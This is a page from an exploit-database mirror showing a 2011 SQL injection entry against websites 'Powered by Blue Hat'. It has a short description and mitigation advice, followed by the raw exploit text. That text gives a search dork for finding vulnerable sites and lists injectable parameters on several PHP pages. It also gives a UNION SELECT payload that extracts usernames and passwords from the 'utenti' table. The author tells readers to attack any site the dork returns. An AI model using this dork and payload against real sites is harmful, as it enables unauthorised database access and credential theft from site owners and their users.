header-logo
Suggest Exploit
vendor:
Sensitive Database
by:
^Xecuti0n3r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Sensitive Database
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Powered by Blue Hat Sensitive Database Disclosure Vulnerability

This vulnerability allows an attacker to gain access to sensitive information from the database of a website that is powered by Blue Hat. The attacker can exploit this vulnerability by entering malicious SQL queries into the vulnerable parameters of the website. The malicious queries can be used to extract sensitive information from the database such as usernames, passwords, and other confidential data.

Mitigation:

To mitigate this vulnerability, the website should use parameterized queries instead of dynamic SQL queries. Additionally, the website should also use input validation to ensure that the user input is valid and does not contain any malicious code.
Source

Exploit-DB raw data:

#(+)Exploit Title: Powered by Blue Hat Sensitive Database Disclosure Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 12.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"Powered by Blue Hat"
#(+) Category  : Web Apps [SQli]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"Powered by Blue Hat" in search engine


    *SQL injection Vulnerability*
	
	
#      [+]http://site.com/video.php?id_att='111
#      [+]http://site.com/video.php?id_att=[SQLI]
#      [+]http://site.com/mappa.php?id_att='2121
#      [+]http://site.com/mappa.php?id_att=[SQLI]
#      [+]http://site.com/elenco_attivita.php?id_cat='101
#      [+]http://site.com/elenco_attivita.php?id_cat=[SQLI]
#      [+]http://site.com/prodotti.php?id='6
#      [+]http://site.com/prodotti.php?id=[SQLI]
#      [+]http://site.com/prodotti.php?id=-6+union+select+1,concat(username,0x3a,password)+from+utenti



____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################